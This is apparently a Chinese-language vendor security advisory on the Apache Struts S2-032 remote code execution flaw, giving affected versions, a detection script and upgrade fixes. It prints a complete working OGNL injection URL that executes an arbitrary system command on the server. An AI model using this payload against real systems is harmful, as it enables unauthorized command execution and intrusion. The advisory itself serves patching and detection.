l 漏洞名称:
Struts (S2-032)远程代码执行
l 漏洞影响版本:
Struts 2.0.0 – Struts 2.3.28(除了2.3.20.2与2.3.24.2)
l 漏洞细节:
目前互联网上已经有攻击利用的远程exp,
其中exp的利用方式为:
http://xxx.xxx.com.cn/index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd[0]).getInputStream()).useDelimiter(%23parameters.pp[0]),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp[0],%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&cmd=id&pp=\\\\A&ppp=%20&encoding=UTF-8
其中id为远程执行的代码
详细截图如下:
l 漏洞演示:
目前魔方已经制作了POC脚本可供用户对目标进行检测,脚本的使用方式如下:
python struts2check.py +目标即可
浏览成功返回的链接,系统返回如下,页面即存在漏洞。
附件下载详细见
http://blog.cubesec.cn/index.php/2016/04/27/struts2-s2032/
l 修补方案:
官方解决方案
Disable Dynamic Method Invocation when possible or upgrade to Apache Struts versions 2.3.20.2, 2.3.24.2 or 2.3.28.1.
防护方案
目前官方已经推出了2.3.20.2、2.3.24.2和2.3.28.1修复了这个问题,大家可以针对自己所使用的版本进行升级。
下载地址:https://struts.apache.org/download.cgi#struts23281
暂无信息
地址:广东省惠州市惠城区东平半岛惠州大道20号赛格大厦1608号
电话:0752-2072178 传真:0752-2072168-0 邮箱:gdoudi@ouditech.com广东欧迪科技有限公司 版权所有
Copyright ©2020 Guangdong Oudi Technology Corporation All Rights Reserved.
粤ICP备16018732号-1